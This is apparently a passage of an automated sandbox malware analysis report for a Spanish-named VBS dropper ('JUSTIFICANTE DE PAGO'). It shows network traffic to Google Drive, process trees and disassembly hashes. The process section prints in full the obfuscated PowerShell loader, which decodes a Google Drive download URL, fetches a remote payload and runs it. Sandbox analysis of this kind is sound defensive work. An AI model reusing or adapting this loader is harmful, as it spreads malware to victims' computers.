                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: drive.google.com
                              Connection: Keep-Alive
                              2024-04-24 05:01:25 UTC1582INHTTP/1.1 303 See Other
                              Content-Type: application/binary
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Wed, 24 Apr 2024 05:01:25 GMT
                              Location: https://drive.usercontent.google.com/download?id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De&export=download
                              Strict-Transport-Security: max-age=31536000
                              Content-Security-Policy: script-src 'nonce-NwSdplKim9TLUF3pGi_eJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Cross-Origin-Opener-Policy: same-origin
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Server: ESF
                              Content-Length: 0
                              X-XSS-Protection: 0
                              X-Frame-Options: SAMEORIGIN
                              X-Content-Type-Options: nosniff
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.1049706142.251.2.1324437420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              2024-04-24 05:01:25 UTC233OUTGET /download?id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De&export=download HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: drive.usercontent.google.com
                              Connection: Keep-Alive
                              2024-04-24 05:01:27 UTC2121INHTTP/1.1 200 OK
                              X-GUploader-UploadID: ABPtcPq3nDtyzK8q6By3y66PYy58FQ4HTml1sikjes70AE8FNHkXLn5CQiVlpFPTdeWeF8QK6P4
                              Content-Type: text/html; charset=utf-8
                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Wed, 24 Apr 2024 05:01:27 GMT
                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                              Cross-Origin-Resource-Policy: same-site
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Content-Security-Policy: script-src 'nonce-lix8fzAPduPs5V3_g64qyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Cross-Origin-Opener-Policy: same-origin
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmII1JBisN47ndUeiJ3SZ7CGAPHqn-dY1wPx4rDzrCuAWIiHY_mSRRvZBD7sntPHCAAJbBUf"
                              Content-Length: 1692
                              Server: UploadServer
                              Set-Cookie: NID=513=RqtV41bQGyYBuQ36ONaOCKID3W_iM6tleogqBZ-Rzvftbvpqut0JJKfVXgGoE9MRBuH1t1edBa_oPQWrL8GTPK4K1Fu7lRSauytjEaJLY7uXSXPN9hoQ0QYX-PX3KJ9kiRef94wI6jvVckZndiP-tHU681QOB1eWwH6xqVdG9r0; expires=Thu, 24-Oct-2024 05:01:26 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Content-Security-Policy: sandbox allow-scripts
                              Connection: close
                              2024-04-24 05:01:27 UTC1692INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 45 46 71 65 79 4a 55 64 71 52 4c 49 62 42 4e 2d 49 71 50 73 77 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                              Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="MEFqeyJUdqRLIbBN-IqPsw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:07:01:20
                              Start date:24/04/2024
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
                              Imagebase:0x7ff753bf0000
                              File size:170'496 bytes
                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:07:01:20
                              Start date:24/04/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturiHer enMontetDesmoesalatrTofro4Bo dg8u,sea=Vic.u$Ge erMUnciabDrvtylDon ee PutnmGlyc ePlat nskovttamalgsopvel.rabb.sAnacep Bltel .ouni.loritSpand(Nstfo$FiskeGBard,aPajamsTuetuhAl,ereCiselsHyp r)Immun ');$Mblements=$Slinter48[0];popess (Agonothet ' seam$Hel.cgArbejlPolygoStadfb Bulea mil ludska: St tREro,ru MatrbGrailrPiot,iExtercHalimeBy.gersti.ueCompasDeafe1Ethan0Almsd7Linea= Ud,tNMineseUd,ikwDeute-K.ystOMarkibEks mjMillieMondncUndelt.rapp BivirSSkizoymuntrs GingtPi.seeDampemArta,.Z nneNSovekeKatystBehag.LimbeWDecaseBillyb obulC.rilal PalaiPjecee,oresnMelletPenna ');popess (Agonothet 'Over.$ YounR RaceuS.ralb lectrFamiliMask.cDi feeHu rarNondeeAxhamsg,bbe1 reol0 Snub7Kri.e.Afr,dHBand.eAktivaMyotod Afkae c tarHegnssValgk[Fa le$Ere.tUEasygn billthasteeOmdebsPalertVisu a ZonkbDockilRo.eseStr,a2Hjeml7 Hjlp]Mi.la=Godsv$MicroSSte.st NudleBestrnHercutNons,r Ba.oyIm.otkGarruk FolkeMaillrIndreiSynale outdrCykeln un eeSuper ');$celandines=Agonothet 'Nbfl.RRa.bruTrst,bOtorrrYpperi,abatcFlommenamnarBranceScreesLindy1.edev0Un.er7Bolon. Eta.D Co loChariwTaarnnSoleml ScanoEks ea TreddS.ambF rudeimo,talKadeneMesat(,earf$GaardMBrystbClumplN,biaeGatt mLrepleFittinP,eintCordesUns,o,wi.es$ KompIProt,sBllebdP rickAfs ukPinnieRetab4Efter7 Dec,)Peace ';$celandines=$Constantias[1]+$celandines;$Isdkke47=$Constantias[0];popess (Agonothet 'Konvo$D sksg .arml ChamoSpdb bForekaOver lDipht:Cit,zhSuffeyForkrdListerVoryso ndymcSpageoTeserrAmantaDab,ilSu.ab=Forem(TraveTMalmieDuknasChlortTo,tu-niobePHa,ndaFejlmt Floth Zadr Men,o$GardeI NivesEpis,dTilbjkRembuk Forge cond4 .jib7Ri.ou)Flirt ');while (!$hydrocoral) {popess (Agonothet 'Drags$ La.egFlo hlLandsoVelgrbPoloeaPremalProgr:me,akDAfregiGirenfHairnfV.jnieKalkurTrstieAfpilnDi hocSuetsiF.actnLan vgGrf.e=Infor$MorgetFakturT ldfuO.stneyderk ') ;popess $celandines;popess (Agonothet 'ApertS Biomt Fonda ObserAnstrtBu.fo-SearcSSa,tal ExpoeU,skyePneu,pCra l Twib4Scute ');popess (Agonothet 'H lpe$ ForsgTaknelZosteo Brugbsvvefa Ge.mlModst:K.wieh prrsy,umildBravurGenudoFeriecZapuso Strur RuskaBloddl Int,=Smaln(LamelTDichoeHa mosQu.nntTin,f-Snup,P,aaseaDisp,tJudash Blan ryg v$Tax eIPiscasKli,kdEcheskNetkokT,aere Canz4 aund7t.ene).ngou ') ;popess (Agonothet 'Disda$ PrergScenalTouchoTra sbD finaSprinlHist :ReproSBiomat Vetco PistwAfbrnwRundtoVeeenoOrthodMythi3Unifo0Kines=Levem$Beva,gDiscelSekito.avfobTe.miarevlelUdben:ReskoSF,ltstR hearNe atgDa,legJurisaraketr UdvinSvarrs .ndesRu.katPlneroRutinf DopifProloeBlomsrAbands.tnkn+Moboc+Apoci%Delta$ EsopS.mitslAlvori UnrenBisamt fvaneu,sacrFarv 4folke8El en.Liberc upero ilduH akpnSteept Anse ') ;$Mblements=$Slinter48[$Stowwood30];}popess (Agonothet 'Tayr $ArmbagQueenlAllezo.mstnbkongsa FremlA.sik:Lege.DLo beo BienmEksameHjulssNden,tTap,oiFennekKohovv,afferEco yeT rjel AndesSilkseSatisr,hilosBaksn Man,a=Sark. Vans GNed,ieAfkastgysen-AiramC B.droCapsinAdiabt KompeSprinn.isfutBolig Phary$ O.onIAlkohsPlombdSenteklimpikKongeeSise.4homon7Bel.c ');popess (Agonothet 'Para,$Deemig Fllel sseoMulslb El,eam anelPs,lm:AgituTgang.eKastrn PhenaNo,prkAffi,tMnstraAmbitk Fste In.er=frekv Fisk[LnsomS Stasy,onvisGlaivt SouveGlaismRudsk. TmthCIsopyo Gl.tnUnprov .jlle Entrrdet ctMedit]Dagos:Endag:DecliFPermirStoppo GenemBelgiBJunipaRe.nfsKl.ppeFrtid6Cornc4Sp,roSAfndetTal.trAcrosiG.oedn MetagNarko(Trfor$ PseuDRailloWhi,emKeybde CystsTreattUnem iC pitk Funkv.idgerm.noseprvebl Venns Unsee uro rsvimls H.lt)Helio ');popess (Agonothet 'Bruse$magt gWag ilAvnedopupilbSaltaaBatiklSlukn: Mo,iR Legga Petrt esole s,ndpE.staeArenanAjoursUnderiStango ShronBlokm Sigil=Teend Skils[CheneSSjipnyO togs vernt ruffeBrnepmSluts.Re,ssTTriloeCa,woxPureetArg.n. ChicE Inten.etshcBu,fpoBr.eod PubliAssonnMis.cgstarn]Tuill:Sulp : poseA HennS AposC RsonI.versIK rsu.kommaGWusppeTi.stt HypeSS ifttLepidrHumifi ,otrnEk.prg,amme(Ba,lo$BourtTFalsieGainsnFrav,aG.dfokOp,evt rmpa.ommekDysan)Bygni ');popess (Agonothet 'Alant$FladbgthramlFolkeo Livsb P.roaMe.halFiske:M,lleMShawwePreinnDecenu,njuraProfilTarint Sti el,ehmrPres nKildeaDelbet R.fli BlatvOverie nudirB usksUn.az9.ntra3Janap=Termo$ FileRCh.mpaPrecitBagste CapipHuehueTillgnDrmmes Nedkisph.gohu,tlnDilet.Syda.s Te,suHaa dbTrilos Sinst Syslr jentiVandsnflunkgCo vi( am,e3serig0 Kom,4Stjer6Jeep,8Dueur3Outsp,Steni2Cysti7 Argu6Tetan4Psych8Nitro)Lubri ');popess $Menualternativers93;"
                              Imagebase:0x7ff7b2bb0000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:07:01:21
                              Start date:24/04/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff620390000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:07:01:23
                              Start date:24/04/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trangstilflde.Per && echo $"
                              Imagebase:0x7ff7f6210000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Disassembly

                              Reset < >

                                Executed Functions

                                Function 00007FF7C1A14B35 Relevance: .4, Instructions: 426COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.1396368118.00007FF7C1A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff7c1a10000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab60fb930100ed7d962e6be0e7a223b133d597454d7ea734177f4b3265178e12
                                • Instruction ID: f3562b6b1699ff3cff5d1350af446e58da33e450281747c512c0ab0747e339ee
                                • Opcode Fuzzy Hash: ab60fb930100ed7d962e6be0e7a223b133d597454d7ea734177f4b3265178e12
                                • Instruction Fuzzy Hash: 13C16831A0DA898FEB55EF2C9854AB9BB91FF46360B6501FFD04EC71D3DA18A805C351
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FF7C1943945 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.1395935885.00007FF7C1940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff7c1940000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                • Instruction ID: 6cd3c5b42bc9be403b0dc36aeda2a319b99b9ae89d08a99cb370ce7d90ff603a
                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                • Instruction Fuzzy Hash: D401677111CB0C8FD748EF0CE451AA5B7E0FB95364F50056EE58AC3651D636E981CB45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 00007FF7C19485FA Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1395935885.00007FF7C1940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff7c1940000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: L_^$L_^$L_^$L_^$L_^
                                • API String ID: 0-2264858084
                                • Opcode ID: 62a8cbaf36892077b8121e27e1085869ccb284688da18f8b56a1d05003f1fb7c
                                • Instruction ID: 643a37b6690e8454e3c35eb809c34ff5491998744d0ae40f98869d2e34c925fa
                                • Opcode Fuzzy Hash: 62a8cbaf36892077b8121e27e1085869ccb284688da18f8b56a1d05003f1fb7c
                                • Instruction Fuzzy Hash: 8C41A4A790D7C24FD3036B2918641D5BF61EF5327879911F7C1D54B293ED68280B8362
                                Uniqueness

                                Uniqueness Score: -1.00%